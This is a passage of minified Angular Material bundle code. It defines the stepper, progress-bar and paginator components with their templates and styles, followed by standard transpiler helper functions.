D8{constructor(e,i,n,r){super(e,r),this._errorStateMatcher=i,this._viewContainerRef=n,this._isSelected=I.EMPTY}ngAfterContentInit(){this._isSelected=this._stepper.steps.changes.pipe(Ur(()=>this._stepper.selectionChange.pipe(Xe(e=>e.selectedStep===this),Ro(this._stepper.selected===this)))).subscribe(e=>{e&&this._lazyContent&&!this._portal&&(this._portal=new Mm(this._lazyContent._template,this._viewContainerRef))})}ngOnDestroy(){this._isSelected.unsubscribe()}isErrorState(e,i){return this._errorStateMatcher.isErrorState(e,i)||!!(e&&e.invalid&&this.interacted)}}return t.\u0275fac=function(e){return new(e||t)(Ee(ja(()=>JV)),Ee(mp,4),Ee(fo),Ee(UV,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-step"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,mA,5),fa(n,fye,5)),2&e){let r;Vt(r=Bt())&&(i.stepLabel=r.first),Vt(r=Bt())&&(i._lazyContent=r.first)}},inputs:{color:"color"},exportAs:["matStep"],features:[ki([{provide:mp,useExisting:t},{provide:D8,useExisting:t}]),ci],ngContentSelectors:iye,decls:1,vars:0,consts:[[3,"cdkPortalOutlet"]],template:function(e,i){1&e&&(Jn(),ne(0,tye,2,1,"ng-template"))},dependencies:[Cu],encapsulation:2,changeDetection:0}),t})(),JV=(()=>{class t extends ub{constructor(e,i,n){super(e,i,n),this.steps=new Cd,this.animationDone=new Tt,this.labelPosition="end",this.headerPosition="top",this._iconOverrides={},this._animationDone=new J,this._animationDuration="";const r=n.nativeElement.nodeName.toLowerCase();this.orientation="mat-vertical-stepper"===r?"vertical":"horizontal"}get animationDuration(){return this._animationDuration}set animationDuration(e){this._animationDuration=/^\d+$/.test(e)?e+"ms":e}ngAfterContentInit(){super.ngAfterContentInit(),this._icons.forEach(({name:e,templateRef:i})=>this._iconOverrides[e]=i),this.steps.changes.pipe(ea(this._destroyed)).subscribe(()=>{this._stateChanged()}),this._animationDone.pipe(Bh((e,i)=>e.fromState===i.fromState&&e.toState===i.toState),ea(this._destroyed)).subscribe(e=>{"current"===e.toState&&this.animationDone.emit()})}_stepIsNavigable(e,i){return i.completed||this.selectedIndex===e||!this.linear}_getAnimationDuration(){return this.animationDuration?this.animationDuration:"horizontal"===this.orientation?"500ms":"225ms"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Cr,8),Ee(Ma),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["mat-stepper"],["mat-vertical-stepper"],["mat-horizontal-stepper"],["","matStepper",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,YV,5),fa(n,hye,5)),2&e){let r;Vt(r=Bt())&&(i._steps=r),Vt(r=Bt())&&(i._icons=r)}},viewQuery:function(e,i){if(1&e&&Mi(QV,5),2&e){let n;Vt(n=Bt())&&(i._stepHeader=n)}},hostAttrs:["role","tablist"],hostVars:11,hostBindings:function(e,i){2&e&&(Rt("aria-orientation",i.orientation),Ct("mat-stepper-horizontal","horizontal"===i.orientation)("mat-stepper-vertical","vertical"===i.orientation)("mat-stepper-label-position-end","horizontal"===i.orientation&&"end"==i.labelPosition)("mat-stepper-label-position-bottom","horizontal"===i.orientation&&"bottom"==i.labelPosition)("mat-stepper-header-position-bottom","bottom"===i.headerPosition))},inputs:{selectedIndex:"selectedIndex",disableRipple:"disableRipple",color:"color",labelPosition:"labelPosition",headerPosition:"headerPosition",animationDuration:"animationDuration"},outputs:{animationDone:"animationDone"},exportAs:["matStepper","matVerticalStepper","matHorizontalStepper"],features:[ki([{provide:ub,useExisting:t}]),ci],decls:5,vars:3,consts:[[3,"ngSwitch"],["class","mat-horizontal-stepper-wrapper",4,"ngSwitchCase"],[4,"ngSwitchCase"],["stepTemplate",""],[1,"mat-horizontal-stepper-wrapper"],[1,"mat-horizontal-stepper-header-container"],[4,"ngFor","ngForOf"],[1,"mat-horizontal-content-container"],["class","mat-horizontal-stepper-content","role","tabpanel",3,"id","mat-horizontal-stepper-content-inactive",4,"ngFor","ngForOf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],["class","mat-stepper-horizontal-line",4,"ngIf"],[1,"mat-stepper-horizontal-line"],["role","tabpanel",1,"mat-horizontal-stepper-content",3,"id"],[3,"ngTemplateOutlet"],["class","mat-step",4,"ngFor","ngForOf"],[1,"mat-step"],[1,"mat-vertical-content-container"],["role","tabpanel",1,"mat-vertical-stepper-content",3,"id"],[1,"mat-vertical-content"],[3,"tabIndex","id","index","state","label","selected","active","optional","errorMessage","iconOverrides","disableRipple","color","click","keydown"]],template:function(e,i){1&e&&(bt(0,0),ne(1,rye,5,2,"div",1),ne(2,cye,2,1,"ng-container",2),Mt(),ne(3,lye,1,23,"ng-template",null,3,d1)),2&e&&(V("ngSwitch",i.orientation),C(1),V("ngSwitchCase","horizontal"),C(1),V("ngSwitchCase","vertical"))},dependencies:[Zi,Ri,_1,Jf,p1,QV],styles:['.mat-stepper-vertical,.mat-stepper-horizontal{display:block}.mat-horizontal-stepper-header-container{white-space:nowrap;display:flex;align-items:center}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header-container{align-items:flex-start}.mat-stepper-header-position-bottom .mat-horizontal-stepper-header-container{order:1}.mat-stepper-horizontal-line{border-top-width:1px;border-top-style:solid;flex:auto;height:0;margin:0 -16px;min-width:32px}.mat-stepper-label-position-bottom .mat-stepper-horizontal-line{margin:0;min-width:0;position:relative}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:first-child)::before,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:last-child)::before,.mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:last-child)::after,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:first-child)::after{border-top-width:1px;border-top-style:solid;content:"";display:inline-block;height:0;position:absolute;width:calc(50% - 20px)}.mat-horizontal-stepper-header{display:flex;height:72px;overflow:hidden;align-items:center;padding:0 24px}.mat-horizontal-stepper-header .mat-step-icon{margin-right:8px;flex:none}[dir=rtl] .mat-horizontal-stepper-header .mat-step-icon{margin-right:0;margin-left:8px}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header{box-sizing:border-box;flex-direction:column;height:auto}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:last-child)::after,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:first-child)::after{right:0}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:first-child)::before,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:not(:last-child)::before{left:0}[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:last-child::before,[dir=rtl] .mat-stepper-label-position-bottom .mat-horizontal-stepper-header:first-child::after{display:none}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header .mat-step-icon{margin-right:0;margin-left:0}.mat-stepper-label-position-bottom .mat-horizontal-stepper-header .mat-step-label{padding:16px 0 0 0;text-align:center;width:100%}.mat-vertical-stepper-header{display:flex;align-items:center;height:24px}.mat-vertical-stepper-header .mat-step-icon{margin-right:12px}[dir=rtl] .mat-vertical-stepper-header .mat-step-icon{margin-right:0;margin-left:12px}.mat-horizontal-stepper-wrapper{display:flex;flex-direction:column}.mat-horizontal-stepper-content{outline:0}.mat-horizontal-stepper-content.mat-horizontal-stepper-content-inactive{height:0;overflow:hidden}.mat-horizontal-content-container{overflow:hidden;padding:0 24px 24px 24px}.cdk-high-contrast-active .mat-horizontal-content-container{outline:solid 1px}.mat-stepper-header-position-bottom .mat-horizontal-content-container{padding:24px 24px 0 24px}.mat-vertical-content-container{margin-left:36px;border:0;position:relative}.cdk-high-contrast-active .mat-vertical-content-container{outline:solid 1px}[dir=rtl] .mat-vertical-content-container{margin-left:0;margin-right:36px}.mat-stepper-vertical-line::before{content:"";position:absolute;left:0;border-left-width:1px;border-left-style:solid}[dir=rtl] .mat-stepper-vertical-line::before{left:auto;right:0}.mat-vertical-stepper-content{overflow:hidden;outline:0}.mat-vertical-content{padding:0 24px 24px 24px}.mat-step:last-child .mat-vertical-content-container{border:none}'],encapsulation:2,data:{animation:[XV.horizontalStepTransition,XV.verticalStepTransition]},changeDetection:0}),t})(),pye=(()=>{class t extends BCe{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["button","matStepperNext",""]],hostAttrs:[1,"mat-stepper-next"],hostVars:1,hostBindings:function(e,i){2&e&&Gs("type",i.type)},inputs:{type:"type"},features:[ci]}),t})(),_ye=(()=>{class t extends HCe{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["button","matStepperPrevious",""]],hostAttrs:[1,"mat-stepper-previous"],hostVars:1,hostBindings:function(e,i){2&e&&Gs("type",i.type)},inputs:{type:"type"},features:[ci]}),t})(),ZV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mye,mp],imports:[la,rn,yu,up,UCe,ib,Od,la]}),t})();const gye=["primaryValueBar"],Cye=Pd(class{constructor(t){this._elementRef=t}},"primary"),yye=new ni("mat-progress-bar-location",{providedIn:"root",factory:function bye(){const t=Po(ga),a=t?t.location:null;return{getPathname:()=>a?a.pathname+a.search:""}}}),Mye=new ni("MAT_PROGRESS_BAR_DEFAULT_OPTIONS");let vye=0,hA=(()=>{class t extends Cye{constructor(e,i,n,r,c,d){super(e),this._ngZone=i,this._animationMode=n,this._changeDetectorRef=d,this._isNoopAnimation=!1,this._value=0,this._bufferValue=0,this.animationEnd=new Tt,this._animationEndSubscription=I.EMPTY,this.mode="determinate",this.progressbarId="mat-progress-bar-"+vye++;const T=r?r.getPathname().split("#")[0]:"";this._rectangleFillValue=`url('${T}#${this.progressbarId}')`,this._isNoopAnimation="NoopAnimations"===n,c&&(c.color&&(this.color=this.defaultColor=c.color),this.mode=c.mode||this.mode)}get value(){return this._value}set value(e){var i;this._value=eB(Uo(e)||0),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck()}get bufferValue(){return this._bufferValue}set bufferValue(e){var i;this._bufferValue=eB(e||0),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck()}_primaryTransform(){return{transform:`scale3d(${this.value/100}, 1, 1)`}}_bufferTransform(){return"buffer"===this.mode?{transform:`scale3d(${this.bufferValue/100}, 1, 1)`}:null}ngAfterViewInit(){this._ngZone.runOutsideAngular(()=>{const e=this._primaryValueBar.nativeElement;this._animationEndSubscription=Tc(e,"transitionend").pipe(Dn(i=>i.target===e)).subscribe(()=>{0!==this.animationEnd.observers.length&&("determinate"===this.mode||"buffer"===this.mode)&&this._ngZone.run(()=>this.animationEnd.next({value:this.value}))})})}ngOnDestroy(){this._animationEndSubscription.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(ar,8),Ee(yye,8),Ee(Mye,8),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-progress-bar"]],viewQuery:function(e,i){if(1&e&&Mi(gye,5),2&e){let n;Vt(n=Bt())&&(i._primaryValueBar=n.first)}},hostAttrs:["role","progressbar","aria-valuemin","0","aria-valuemax","100","tabindex","-1",1,"mat-progress-bar"],hostVars:4,hostBindings:function(e,i){2&e&&(Rt("aria-valuenow","indeterminate"===i.mode||"query"===i.mode?null:i.value)("mode",i.mode),Ct("_mat-animation-noopable",i._isNoopAnimation))},inputs:{color:"color",value:"value",bufferValue:"bufferValue",mode:"mode"},outputs:{animationEnd:"animationEnd"},exportAs:["matProgressBar"],features:[ci],decls:10,vars:4,consts:[["aria-hidden","true"],["width","100%","height","4","focusable","false",1,"mat-progress-bar-background","mat-progress-bar-element"],["x","4","y","0","width","8","height","4","patternUnits","userSpaceOnUse",3,"id"],["cx","2","cy","2","r","2"],["width","100%","height","100%"],[1,"mat-progress-bar-buffer","mat-progress-bar-element",3,"ngStyle"],[1,"mat-progress-bar-primary","mat-progress-bar-fill","mat-progress-bar-element",3,"ngStyle"],["primaryValueBar",""],[1,"mat-progress-bar-secondary","mat-progress-bar-fill","mat-progress-bar-element"]],template:function(e,i){1&e&&(m(0,"div",0),fi(),m(1,"svg",1)(2,"defs")(3,"pattern",2),it(4,"circle",3),u()(),it(5,"rect",4),u(),ln(),it(6,"div",5)(7,"div",6,7)(9,"div",8),u()),2&e&&(C(3),V("id",i.progressbarId),C(2),Rt("fill",i._rectangleFillValue),C(1),V("ngStyle",i._bufferTransform()),C(1),V("ngStyle",i._primaryTransform()))},dependencies:[Yv],styles:['.mat-progress-bar{display:block;height:4px;overflow:hidden;position:relative;transition:opacity 250ms linear;width:100%}.mat-progress-bar._mat-animation-noopable{transition:none !important;animation:none !important}.mat-progress-bar .mat-progress-bar-element,.mat-progress-bar .mat-progress-bar-fill::after{height:100%;position:absolute;width:100%}.mat-progress-bar .mat-progress-bar-background{width:calc(100% + 10px)}.cdk-high-contrast-active .mat-progress-bar .mat-progress-bar-background{display:none}.mat-progress-bar .mat-progress-bar-buffer{transform-origin:top left;transition:transform 250ms ease}.cdk-high-contrast-active .mat-progress-bar .mat-progress-bar-buffer{border-top:solid 5px;opacity:.5}.mat-progress-bar .mat-progress-bar-secondary{display:none}.mat-progress-bar .mat-progress-bar-fill{animation:none;transform-origin:top left;transition:transform 250ms ease}.cdk-high-contrast-active .mat-progress-bar .mat-progress-bar-fill{border-top:solid 4px}.mat-progress-bar .mat-progress-bar-fill::after{animation:none;content:"";display:inline-block;left:0}.mat-progress-bar[dir=rtl],[dir=rtl] .mat-progress-bar{transform:rotateY(180deg)}.mat-progress-bar[mode=query]{transform:rotateZ(180deg)}.mat-progress-bar[mode=query][dir=rtl],[dir=rtl] .mat-progress-bar[mode=query]{transform:rotateZ(180deg) rotateY(180deg)}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-fill,.mat-progress-bar[mode=query] .mat-progress-bar-fill{transition:none}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-primary,.mat-progress-bar[mode=query] .mat-progress-bar-primary{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-primary-indeterminate-translate 2000ms infinite linear;left:-145.166611%}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-primary.mat-progress-bar-fill::after,.mat-progress-bar[mode=query] .mat-progress-bar-primary.mat-progress-bar-fill::after{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-primary-indeterminate-scale 2000ms infinite linear}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-secondary,.mat-progress-bar[mode=query] .mat-progress-bar-secondary{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-secondary-indeterminate-translate 2000ms infinite linear;left:-54.888891%;display:block}.mat-progress-bar[mode=indeterminate] .mat-progress-bar-secondary.mat-progress-bar-fill::after,.mat-progress-bar[mode=query] .mat-progress-bar-secondary.mat-progress-bar-fill::after{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-secondary-indeterminate-scale 2000ms infinite linear}.mat-progress-bar[mode=buffer] .mat-progress-bar-background{-webkit-backface-visibility:hidden;backface-visibility:hidden;animation:mat-progress-bar-background-scroll 250ms infinite linear;display:block}.mat-progress-bar._mat-animation-noopable .mat-progress-bar-fill,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-fill::after,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-buffer,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-primary,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-primary.mat-progress-bar-fill::after,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-secondary,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-secondary.mat-progress-bar-fill::after,.mat-progress-bar._mat-animation-noopable .mat-progress-bar-background{animation:none;transition-duration:1ms}@keyframes mat-progress-bar-primary-indeterminate-translate{0%{transform:translateX(0)}20%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(0)}59.15%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(83.67142%)}100%{transform:translateX(200.611057%)}}@keyframes mat-progress-bar-primary-indeterminate-scale{0%{transform:scaleX(0.08)}36.65%{animation-timing-function:cubic-bezier(0.334731, 0.12482, 0.785844, 1);transform:scaleX(0.08)}69.15%{animation-timing-function:cubic-bezier(0.06, 0.11, 0.6, 1);transform:scaleX(0.661479)}100%{transform:scaleX(0.08)}}@keyframes mat-progress-bar-secondary-indeterminate-translate{0%{animation-timing-function:cubic-bezier(0.15, 0, 0.515058, 0.409685);transform:translateX(0)}25%{animation-timing-function:cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);transform:translateX(37.651913%)}48.35%{animation-timing-function:cubic-bezier(0.4, 0.627035, 0.6, 0.902026);transform:translateX(84.386165%)}100%{transform:translateX(160.277782%)}}@keyframes mat-progress-bar-secondary-indeterminate-scale{0%{animation-timing-function:cubic-bezier(0.15, 0, 0.515058, 0.409685);transform:scaleX(0.08)}19.15%{animation-timing-function:cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);transform:scaleX(0.457104)}44.15%{animation-timing-function:cubic-bezier(0.4, 0.627035, 0.6, 0.902026);transform:scaleX(0.72796)}100%{transform:scaleX(0.08)}}@keyframes mat-progress-bar-background-scroll{to{transform:translateX(-8px)}}'],encapsulation:2,changeDetection:0}),t})();function eB(t,a=0,e=100){return Math.max(a,Math.min(e,t))}let tB=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,la]}),t})();function Aye(t,a){if(1&t&&(m(0,"mat-option",19),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct(" ",e," ")}}function Tye(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",16)(1,"mat-select",17),he("selectionChange",function(n){return be(e),Me(B(2)._changePageSize(n.value))}),ne(2,Aye,2,2,"mat-option",18),u()()}if(2&t){const e=B(2);V("appearance",e._formFieldAppearance)("color",e.color),C(1),V("value",e.pageSize)("disabled",e.disabled)("panelClass",e.selectConfig.panelClass||"")("disableOptionCentering",e.selectConfig.disableOptionCentering)("aria-label",e._intl.itemsPerPageLabel),C(1),V("ngForOf",e._displayedPageSizeOptions)}}function Eye(t,a){if(1&t&&(m(0,"div",20),s(1),u()),2&t){const e=B(2);C(1),ke(e.pageSize)}}function Dye(t,a){if(1&t&&(m(0,"div",12)(1,"div",13),s(2),u(),ne(3,Tye,3,8,"mat-form-field",14),ne(4,Eye,2,1,"div",15),u()),2&t){const e=B();C(2),ct(" ",e._intl.itemsPerPageLabel," "),C(1),V("ngIf",e._displayedPageSizeOptions.length>1),C(1),V("ngIf",e._displayedPageSizeOptions.length<=1)}}function xye(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){return be(e),Me(B().firstPage())}),fi(),m(1,"svg",7),it(2,"path",22),u()()}if(2&t){const e=B();V("matTooltip",e._intl.firstPageLabel)("matTooltipDisabled",e._previousButtonsDisabled())("matTooltipPosition","above")("disabled",e._previousButtonsDisabled()),Rt("aria-label",e._intl.firstPageLabel)}}function wye(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",23),he("click",function(){return be(e),Me(B().lastPage())}),fi(),m(1,"svg",7),it(2,"path",24),u()()}if(2&t){const e=B();V("matTooltip",e._intl.lastPageLabel)("matTooltipDisabled",e._nextButtonsDisabled())("matTooltipPosition","above")("disabled",e._nextButtonsDisabled()),Rt("aria-label",e._intl.lastPageLabel)}}let q1=(()=>{class t{constructor(){this.changes=new J,this.itemsPerPageLabel="Items per page:",this.nextPageLabel="Next page",this.previousPageLabel="Previous page",this.firstPageLabel="First page",this.lastPageLabel="Last page",this.getRangeLabel=(e,i,n)=>{if(0==n||0==i)return`0 of ${n}`;const r=e*i;return`${r+1} \u2013 ${r<(n=Math.max(n,0))?Math.min(r+i,n):r+i} of ${n}`}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const Rye={provide:q1,deps:[[new Cc,new Vc,q1]],useFactory:function Iye(t){return t||new q1}},kye=new ni("MAT_PAGINATOR_DEFAULT_OPTIONS"),Pye=Zc(yW(class{}));let Oye=(()=>{class t extends Pye{constructor(e,i,n){if(super(),this._intl=e,this._changeDetectorRef=i,this._pageIndex=0,this._length=0,this._pageSizeOptions=[],this._hidePageSize=!1,this._showFirstLastButtons=!1,this.selectConfig={},this.page=new Tt,this._intlChanges=e.changes.subscribe(()=>this._changeDetectorRef.markForCheck()),n){const{pageSize:r,pageSizeOptions:c,hidePageSize:d,showFirstLastButtons:T}=n;null!=r&&(this._pageSize=r),null!=c&&(this._pageSizeOptions=c),null!=d&&(this._hidePageSize=d),null!=T&&(this._showFirstLastButtons=T)}}get pageIndex(){return this._pageIndex}set pageIndex(e){this._pageIndex=Math.max(Uo(e),0),this._changeDetectorRef.markForCheck()}get length(){return this._length}set length(e){this._length=Uo(e),this._changeDetectorRef.markForCheck()}get pageSize(){return this._pageSize}set pageSize(e){this._pageSize=Math.max(Uo(e),0),this._updateDisplayedPageSizeOptions()}get pageSizeOptions(){return this._pageSizeOptions}set pageSizeOptions(e){this._pageSizeOptions=(e||[]).map(i=>Uo(i)),this._updateDisplayedPageSizeOptions()}get hidePageSize(){return this._hidePageSize}set hidePageSize(e){this._hidePageSize=wi(e)}get showFirstLastButtons(){return this._showFirstLastButtons}set showFirstLastButtons(e){this._showFirstLastButtons=wi(e)}ngOnInit(){this._initialized=!0,this._updateDisplayedPageSizeOptions(),this._markInitialized()}ngOnDestroy(){this._intlChanges.unsubscribe()}nextPage(){if(!this.hasNextPage())return;const e=this.pageIndex;this.pageIndex=this.pageIndex+1,this._emitPageEvent(e)}previousPage(){if(!this.hasPreviousPage())return;const e=this.pageIndex;this.pageIndex=this.pageIndex-1,this._emitPageEvent(e)}firstPage(){if(!this.hasPreviousPage())return;const e=this.pageIndex;this.pageIndex=0,this._emitPageEvent(e)}lastPage(){if(!this.hasNextPage())return;const e=this.pageIndex;this.pageIndex=this.getNumberOfPages()-1,this._emitPageEvent(e)}hasPreviousPage(){return this.pageIndex>=1&&0!=this.pageSize}hasNextPage(){const e=this.getNumberOfPages()-1;return this.pageIndex<e&&0!=this.pageSize}getNumberOfPages(){return this.pageSize?Math.ceil(this.length/this.pageSize):0}_changePageSize(e){const n=this.pageIndex;this.pageIndex=Math.floor(this.pageIndex*this.pageSize/e)||0,this.pageSize=e,this._emitPageEvent(n)}_nextButtonsDisabled(){return this.disabled||!this.hasNextPage()}_previousButtonsDisabled(){return this.disabled||!this.hasPreviousPage()}_updateDisplayedPageSizeOptions(){!this._initialized||(this.pageSize||(this._pageSize=0!=this.pageSizeOptions.length?this.pageSizeOptions[0]:50),this._displayedPageSizeOptions=this.pageSizeOptions.slice(),-1===this._displayedPageSizeOptions.indexOf(this.pageSize)&&this._displayedPageSizeOptions.push(this.pageSize),this._displayedPageSizeOptions.sort((e,i)=>e-i),this._changeDetectorRef.markForCheck())}_emitPageEvent(e){this.page.emit({previousPageIndex:e,pageIndex:this.pageIndex,pageSize:this.pageSize,length:this.length})}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{color:"color",pageIndex:"pageIndex",length:"length",pageSize:"pageSize",pageSizeOptions:"pageSizeOptions",hidePageSize:"hidePageSize",showFirstLastButtons:"showFirstLastButtons",selectConfig:"selectConfig"},outputs:{page:"page"},features:[ci]}),t})(),x8=(()=>{class t extends Oye{constructor(e,i,n){super(e,i,n),n&&null!=n.formFieldAppearance&&(this._formFieldAppearance=n.formFieldAppearance)}}return t.\u0275fac=function(e){return new(e||t)(Ee(q1),Ee(Ma),Ee(kye,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-paginator"]],hostAttrs:["role","group",1,"mat-paginator"],inputs:{disabled:"disabled"},exportAs:["matPaginator"],features:[ci],decls:14,vars:14,consts:[[1,"mat-paginator-outer-container"],[1,"mat-paginator-container"],["class","mat-paginator-page-size",4,"ngIf"],[1,"mat-paginator-range-actions"],[1,"mat-paginator-range-label"],["mat-icon-button","","type","button","class","mat-paginator-navigation-first",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click",4,"ngIf"],["mat-icon-button","","type","button",1,"mat-paginator-navigation-previous",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click"],["viewBox","0 0 24 24","focusable","false",1,"mat-paginator-icon"],["d","M15.41 7.41L14 6l-6 6 6 6 1.41-1.41L10.83 12z"],["mat-icon-button","","type","button",1,"mat-paginator-navigation-next",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click"],["d","M10 6L8.59 7.41 13.17 12l-4.58 4.59L10 18l6-6z"],["mat-icon-button","","type","button","class","mat-paginator-navigation-last",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click",4,"ngIf"],[1,"mat-paginator-page-size"],[1,"mat-paginator-page-size-label"],["class","mat-paginator-page-size-select",3,"appearance","color",4,"ngIf"],["class","mat-paginator-page-size-value",4,"ngIf"],[1,"mat-paginator-page-size-select",3,"appearance","color"],[3,"value","disabled","panelClass","disableOptionCentering","aria-label","selectionChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],[1,"mat-paginator-page-size-value"],["mat-icon-button","","type","button",1,"mat-paginator-navigation-first",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click"],["d","M18.41 16.59L13.82 12l4.59-4.59L17 6l-6 6 6 6zM6 6h2v12H6z"],["mat-icon-button","","type","button",1,"mat-paginator-navigation-last",3,"matTooltip","matTooltipDisabled","matTooltipPosition","disabled","click"],["d","M5.59 7.41L10.18 12l-4.59 4.59L7 18l6-6-6-6zM16 6h2v12h-2z"]],template:function(e,i){1&e&&(m(0,"div",0)(1,"div",1),ne(2,Dye,5,3,"div",2),m(3,"div",3)(4,"div",4),s(5),u(),ne(6,xye,3,5,"button",5),m(7,"button",6),he("click",function(){return i.previousPage()}),fi(),m(8,"svg",7),it(9,"path",8),u()(),ln(),m(10,"button",9),he("click",function(){return i.nextPage()}),fi(),m(11,"svg",7),it(12,"path",10),u()(),ne(13,wye,3,5,"button",11),u()()()),2&e&&(C(2),V("ngIf",!i.hidePageSize),C(3),ct(" ",i._intl.getRangeLabel(i.pageIndex,i.pageSize,i.length)," "),C(1),V("ngIf",i.showFirstLastButtons),C(1),V("matTooltip",i._intl.previousPageLabel)("matTooltipDisabled",i._previousButtonsDisabled())("matTooltipPosition","above")("disabled",i._previousButtonsDisabled()),Rt("aria-label",i._intl.previousPageLabel),C(3),V("matTooltip",i._intl.nextPageLabel)("matTooltipDisabled",i._nextButtonsDisabled())("matTooltipPosition","above")("disabled",i._nextButtonsDisabled()),Rt("aria-label",i._intl.nextPageLabel),C(3),V("ngIf",i.showFirstLastButtons))},dependencies:[Zi,Ri,da,nn,Nr,yr,Pa],styles:[".mat-paginator{display:block}.mat-paginator-outer-container{display:flex}.mat-paginator-container{display:flex;align-items:center;justify-content:flex-end;padding:0 8px;flex-wrap:wrap-reverse;width:100%}.mat-paginator-page-size{display:flex;align-items:baseline;margin-right:8px}[dir=rtl] .mat-paginator-page-size{margin-right:0;margin-left:8px}.mat-paginator-page-size-label{margin:0 4px}.mat-paginator-page-size-select{margin:6px 4px 0 4px;width:56px}.mat-paginator-page-size-select.mat-form-field-appearance-outline{width:64px}.mat-paginator-page-size-select.mat-form-field-appearance-fill{width:64px}.mat-paginator-range-label{margin:0 32px 0 24px}.mat-paginator-range-actions{display:flex;align-items:center}.mat-paginator-icon{display:inline-block;width:28px;fill:currentColor}[dir=rtl] .mat-paginator-icon{transform:rotate(180deg)}.cdk-high-contrast-active .mat-paginator-icon{fill:CanvasText}"],encapsulation:2,changeDetection:0}),t})(),iB=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Rye],imports:[rn,up,s8,h8,la]}),t})();function aB(t,a){var e=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);a&&(i=i.filter(function(n){return Object.getOwnPropertyDescriptor(t,n).enumerable})),e.push.apply(e,i)}return e}function ia(t){for(var a=1;a<arguments.length;a++){var e=null!=arguments[a]?arguments[a]:{};a%2?aB(Object(e),!0).forEach(function(i){Ws(t,i,e[i])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(e)):aB(Object(e)).forEach(function(i){Object.defineProperty(t,i,Object.getOwnPropertyDescriptor(e,i))})}return t}function fA(t){return(fA="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(a){return typeof a}:function(a){return a&&"function"==typeof Symbol&&a.constructor===Symbol&&a!==Symbol.prototype?"symbol":typeof a})(t)}function nB(t,a){for(var e=0;e<a.length;e++){var i=a[e];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function Ws(t,a,e){return a in t?Object.defineProperty(t,a,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[a]=e,t}function w8(t,a){return function Fye(t){if(Array.isArray(t))return t}(t)||function Bye(t,a){var e=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=e){var c,d,i=[],n=!0,r=!1;try{for(e=e.call(t);!(n=(c=e.next()).done)&&(i.push(c.value),!a||i.length!==a);n=!0);}catch(T){r=!0,d=T}finally{try{!n&&null!=e.return&&e.return()}finally{if(r)throw d}}return i}}(t,a)||oB(t,a)||function Uye(){throw new TypeError("Invalid attempt to 